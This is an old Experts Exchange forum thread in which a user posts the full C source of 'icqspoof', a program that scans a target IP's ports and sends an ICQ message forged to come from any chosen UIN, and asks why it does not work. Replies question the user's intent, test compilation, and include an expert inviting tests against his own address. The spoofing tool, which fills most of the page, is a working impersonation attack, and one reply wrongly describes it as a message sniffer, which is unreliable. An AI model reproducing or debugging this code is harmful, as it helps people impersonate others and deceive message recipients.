• C

Help!

I founde this program, but I can't get it to work.
Can someone help me?????
I thin'k it's smoething wrong in the code.

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <string.h>

int main(argc, argv)
int argc;
char *argv[];
{
  struct sockaddr_in sin;
        int sock,i,x,y;
        unsigned long uin;
        int Port;

  char buffer[16];
  int connected = 1;
  typedef struct icq_prot {
  unsigned char magicNum[2];
  unsigned char UIN[4];
  unsigned char unknown[4];
  unsigned char unknown2[2];
  unsigned char length[2];
  unsigned char strng[256];
  } icq_prot;
  icq_prot sendMessage;
  unsigned long temp;
  unsigned char bigguy[1024];
  if (argc != 6)
    {
      fprintf(stderr,"Usage:  icqspoof ip SpoofedUIN message startport endport\n");

    exit(1);
  }
  Port = ScanPort(argv[1],atoi(argv[4]),atoi(argv[5]));
  if (Port == -1) {
                printf("No ICQ Port Found =(\n");
                return;
  }

  sendMessage.magicNum[0]=0x2e;
  sendMessage.magicNum[1]=0x0;
  sendMessage.unknown[0]=0x04;
  sendMessage.unknown[1]=0x01;
  sendMessage.unknown[2]=0x0F;
  sendMessage.unknown[3]=0x0;
  sendMessage.unknown2[0]=0x01;
  sendMessage.unknown2[1]=0x0;
  temp=atol(argv[3]);
  sendMessage.UIN[0]=temp & 0xFF;
  sendMessage.UIN[1]=(temp >> 8) & 0xFF;
  sendMessage.UIN[2]=(temp >> 16) & 0xFF;
  sendMessage.UIN[3]=0;
  strncpy(sendMessage.strng,argv[3],256);
  sendMessage.length[0]=strlen(sendMessage.strng)+1;
  sendMessage.length[1]=0;

  if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
                        printf("Error: Unable to creat socket, Exiting.\n");
                        exit(1);
                }
  sin.sin_family = AF_INET;
                sin.sin_addr.s_addr = inet_addr(argv[1]);
                sin.sin_port = htons(Port);

   if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))==-1) {
                        printf("Error Connecting to Socket\n");
                        return;
   }



  x=20;
  bigguy[0]=sendMessage.magicNum[0];
  bigguy[1]=sendMessage.magicNum[1];
  bigguy[2]=sendMessage.UIN[0];
  bigguy[3]=sendMessage.UIN[1];
  bigguy[4]=sendMessage.UIN[2];
  bigguy[5]=sendMessage.UIN[3];
  bigguy[6]=0x02;
  bigguy[7]=0x00;
  bigguy[8]=0xEE;
  bigguy[9]=0x07;
  bigguy[10]=0x00;
  bigguy[11]=0x00;
  bigguy[12]=sendMessage.UIN[0];
  bigguy[13]=sendMessage.UIN[1];
  bigguy[14]=sendMessage.UIN[2];
  bigguy[15]=sendMessage.UIN[3];
  bigguy[16]=0x01;
  bigguy[17]=0x00;
  bigguy[18]=sendMessage.length[0];
  bigguy[19]=sendMessage.length[1];
  for(i=0;i<sendMessage.length[0];i++)
  bigguy[x++]=sendMessage.strng[i];
  bigguy[x++]=0x82;
  bigguy[x++]=0xD7;
  bigguy[x++]=0xF3;
  bigguy[x++]=0x20;
  bigguy[x++]=0x82;
  bigguy[x++]=0xD7;
  bigguy[x++]=0xF3;
  bigguy[x++]=0x20;
  bigguy[x++]=0x09;
  bigguy[x++]=0x04;
  bigguy[x++]=0x00;
  bigguy[x++]=0x00;
  bigguy[x++]=0x04;
  bigguy[x++]=0x00;
  bigguy[x++]=0x00;
  bigguy[x++]=0x10;
  bigguy[x++]=0x01;
  bigguy[x++]=0xEB;
  bigguy[x++]=0xFF;
  bigguy[x++]=0xFF;
  bigguy[x++]=0xFF;
  bigguy[x++]=0x02;
  bigguy[x++]=0x00;
  bigguy[x++]=0x0A;
  bigguy[x++]=0x09;
  bigguy[x++]=0x00;

  write(sock,bigguy,x-1);
  printf("Done!\n");
  close(sock);
  return 0;
}

int ScanPort(char *ipaddr, int StartIP, int EndIP) {
        struct sockaddr_in sin;
        int sock,x,y;
        unsigned long uin;

        printf("Scanning Ports");
        for (x=StartIP;x<=EndIP;++x) {
                if (!(sock = socket(AF_INET, SOCK_STREAM, 0))) {
                        printf("Error: Unable to connect\n");
                        return -1;
                }
                sin.sin_family = AF_INET;
                sin.sin_addr.s_addr = inet_addr(ipaddr);
                sin.sin_port = htons(x);

                if (connect(sock, (struct sockaddr*)&sin,sizeof(sin))!=-1) {
                        close(sock);
                        printf("Port %d Open! Spoofing...\n",x);
                        fflush(stdout);
                        return x;
                }
                printf(".");
                fflush(stdout);
        }
        printf("\n");
        return -1;
}
chuckenAsked:
Who is Participating?

[Product update] Infrastructure Analysis Tool is now available with Business Accounts.Learn More

x
I wear a lot of hats...

"The solutions and answers provided on Experts Exchange have been extremely helpful to me over the last few years. I wear a lot of hats - Developer, Database Administrator, Help Desk, etc., so I know a lot of things but not a lot about one thing. Experts Exchange gives me answers from people who do know a lot about one thing, in a easy to use platform." -Todd S.

jpk041897Commented:
What platform/compiler is this code supposed to have been written for?

The use of main seems to indicate a DOS/UNIX plattform and the netinet\ ans arpa\ almost certanly indicate either a UNIX platform or the use of some spetial library.
0
jtwine100697Commented:
  Kinda interesting that you want help on compiling a program that is designed to mess with ICQ... :P

-=- James.
0
TalenceCommented:
I tried to compile this program on my RedHat 4.2 linux box:

# gcc -o icq icq.c
# ./icq
Usage: icqspoof ip SpoofedUIN message startport
   endport

So: doesn't seem like there is a problem in the code. If you
    use the same OS/distribution, this should compile cleanly.

What do you intend to uhm.. use it for, btw? ;-) Another btw:
it's lots of fun to experiment with these 'nasty programs', but
if you don't know what you're doing you may get into quite a
lot of trouble.
   



0

Experts Exchange Solution brought to you by

Your issues matter to us.

Facing a tech roadblock? Get the help and guidance you need from experienced professionals who care. Ask your question anytime, anywhere, with no hassle.

Start your 7-day free trial
Simple Misconfiguration =Network Vulnerability

In this technical webinar, AlgoSec will present several examples of common misconfigurations; including a basic device change, business application connectivity changes, and data center migrations. Learn best practices to protect your business from attack.

chuckenAuthor Commented:
The problem is not that I can't compile it. I't doesn't work for me.

I intend to use it as a cgi-script whicha are sending me icq-messages from my homepage. Is there any better way to do that?)

Btw.
 
I compile it with gcc icq.c -o icq
An try to send a message to my self.
I start my icq on my other machine with ip X.Y.Z
and type

icq X.Y.Z CCCCC Hello 0 40000

And I don't get any icq message. Why?
0
jpk041897Commented:
Mostly, I believe you don't get the message because the code appers to be a spoofer (aka sniffer). It seems to be designed to read other peoples messages, not sending messages to you.
0
chuckenAuthor Commented:
Oh? Why this in the head of the file????? An why the message part in the Usage????

/* icqspoof.c -  This program sends a message to a given ICQ user and it
 * will appear to be from an arbitrary UIN. Loads of fun.
 *                                                                        
0
jtwine100697Commented:
  "X.Y.Z" is an incomplete IP address...  It should have *4* octets...  Like "W.X.Y.Z"...  Also, "CCCCC" is an invalid UIN, you might need to use a numeric one...

-=- James.
0
chuckenAuthor Commented:
Those Where exampels.  Instead of X.Y.Z I enterd my  ip-adress. And instead of CCCCCC I enterd my friends UIN just to test. I'm not so stupid.
0
jtwine100697Commented:
  OK...  Try it with me...  My IP address is 204.237.1.4, and try ports 1206, and 1207.

   BTW: If you do not want others to think that you are "so stupid", provide explicit examples!

-=- James.
0
chuckenAuthor Commented:
No ports found.... :-(
0
jtwine100697Commented:
  Dunno what to tell you then...

-=- James.
0
It's more than this solution.Get answers and train to solve all your tech problems - anytime, anywhere.Try it for free Edge Out The Competitionfor your dream job with proven skills and certifications.Get started today Stand Outas the employee with proven skills.Start learning today for free Move Your Career Forwardwith certification training in the latest technologies.Start your trial today
C

From novice to tech pro — start learning today.